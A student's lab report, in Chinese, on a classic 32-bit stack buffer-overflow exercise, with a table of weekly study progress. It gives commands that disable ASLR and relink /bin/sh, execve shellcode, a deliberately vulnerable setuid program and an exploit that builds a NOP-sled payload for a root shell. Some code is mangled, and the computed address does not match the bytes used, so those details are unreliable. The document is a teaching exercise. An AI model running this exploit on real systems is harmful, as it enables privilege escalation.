实验简介
- 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。
实验准备
-
系统用户名shiyanlou
-
为了方便观察汇编语句,需要在32位环境下进行操作,如果本身的系统是64位,那么需要执行命令
sudo apt-get update、sudo apt-get install lib32z1 libc6-dev-i386、sudo apt-get install lib32readline-gplv2-dev -
输入命令“linux32”进入32位linux环境,输入“/bin/bash”使用bash会让命令行使用更舒服
实验步骤
初始设置
-
Ubuntu和其他一些Linux系统中,使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中,使用
sudo sysctl -w kernel.randomize_va_space=0命令关闭这一功能
-
此外,为了进一步防范缓冲区溢出攻击及其它利用shell程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使能欺骗一个Set-UID程序调用一个shell,也不能在这个shell中保持root权限,这个防护措施在/bin/bash中实现。
-
linux系统中,/bin/sh实际是指向/bin/bash或/bin/dash的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个shell程序(zsh)代替/bin/bash。
sudo su
cd /bin
rm sh
ln -s zsh sh
exit
shellcode
-
一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实现其他功能,这段代码就是shellcode。
-
本次试验的代码段是
#include <stdio.h>
int main( ) {
char *name[2];
name[0] = ‘‘/bin/sh’’;
name[1] = NULL;
execve(name[0], name, NULL);
}
-
本次实验的shellcode,就是上面代码的汇编版本:
\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
漏洞程序
- 把以下代码保存为“stack.c”文件,保存到 /tmp 目录下,需要加入的头文件是
stdlib.h、stdio.h、string.h
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
int bof(char *str)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
-
通过上面的代码可以知道,程序会读取一个名为“badfile”的文件,并将文件内容装入“buffer”。编译该程序,并设置SET-UID。
sudo su
gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
chmod u+s stack
exit
-
GCC编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用 –fno-stack-protector 关闭这种机制。而
-z execstack用于允许执行栈。
攻击程序
-
本次试验的目的是攻击刚才的漏洞程序,并通过攻击获得root权限。
-
把以下代码保存为“exploit.c”文件,保存到 /tmp 目录下,添加的头文件是
stdlib.h、stdio.h、string.h
/* exploit.c /
/ A program that creates a file containing code for launching shell*/
char shellcode[]=
"\x31\xc0" //xorl %eax,%eax
"\x50" //pushl %eax
"\x68""//sh" //pushl $0x68732f2f
"\x68""/bin" //pushl $0x6e69622f
"\x89\xe3" //movl %esp,%ebx
"\x50" //pushl %eax
"\x53" //pushl %ebx
"\x89\xe1" //movl %esp,%ecx
"\x99" //cdq
"\xb0\x0b" //movb $0x0b,%al
"\xcd\x80" //int $0x80
void main(int argc, char **argv)
{
char buffer[517];
FILE badfile;
/ Initialize buffer with 0x90 (NOP instruction) /
memset(&buffer, 0x90, 517);
/ You need to fill the buffer with appropriate contents here /
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);
/ Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
-
注意上面的代码,“\x??\x??\x??\x??”处需要添上shellcode保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。而 strcpy(buffer+100,shellcode); 这一句又告诉我们,shellcode保存在 buffer+100 的位置。
-
要得到shellcode保存在内存中的地址,用
gdb stack
disass main
-
得到
-
接下来
-
根据语句 strcpy(buffer+100,shellcode); 我们计算shellcode的地址为 0xffffd020(十六进制)+100(十进制)=0xffffd084(十六进制)
-
现在修改exploit.c文件!将 \x??\x??\x??\x?? 修改为 \x74\xd0\xff\xff
攻击结果
实验遇到的问题及解决办法
-
在进入linux32时
-
编译exploit.c时出现缓冲区溢出问题,因为系统默认使用了GCC的“ -fstack-protector"参数导致,解决办法是在程序编译的时候,加上一个选项即可:"-fno-stack-protector"
感想
- 本次试验进行的较为顺利,中途也有遇到一些问题。个人实验环境不同,别人的实验能顺利进行的地方不一定自己的也能顺利进行,要自己动手多多实践。
学期目标
- 入门网络攻防,能走下来流程,最终能攻破防御较差的目标机
学习进度条
| 教材学习 | 视频学习 | 博客量(新增/累积) | 重要成长 | |
|---|---|---|---|---|
| 目标 | 12章 | 20篇 | ||
| 第一周 | 《Linux基础入门》 | 1/1 | 练习Linux命令,在码云上面创建项目,学习使用博客园写博客并用Markdown编辑器规范格式 | |
| 第二周 | 第一二章 | 5个kali视频 | 2/3 | 初识网络攻防,了解基本知识 |
| 第三周 | 第三章 | 5个kali视频 | 1/4 | 学习了kali linux下信息收集阶段的探测工具 |
| 第四周 | 第四章 | 5个kali视频 | 1/5 | 学习了kali linux下漏洞分析的各种工具,wireshark的使用,学习了网络嗅探与协议分析 |
| 第五周 | 第十一、十二章 | 5个kali视频 | 1/6 | 学习了kali linux下漏洞分析之数据库评估软件的使用,也学习了SQL、XSS注入方面的一些知识 |
| 第六周 | 第五六章 | 5个kali视频 | 1/7 | 学习了kali linux下密码攻击的一些知识,学习了网络TCP/IP网络协议工具以及网络安全防范技术 |
| 第七周 | 第七章 | 5个kali视频 | 1/8 | 学习了了Windows操作系统的知识以及在Windows操作系统下怎么进行远程攻击,也学习了kali下meterpreter的使用以及网络TCP/IP网络协议工具以及网络安全防范技术 |
| 第八周 | 第八章 | 5个kali视频 | 1/9 | 学习了kali下后门的一些工具,以及漏洞利用的知识,学习了Linux操作系统安全攻防的一些基本知识 |
| 第九周 | 第九章 | 5个kali视频 | 1/10 | 主要进行了namp的实践记录,学习了恶意代码的基础知识及分析方法 |
| 第十周 | 1/11 | 根据实验楼缓冲区溢出的实验,进行了学习并且实践,并对实验内容以及实践过程进行了记录 |
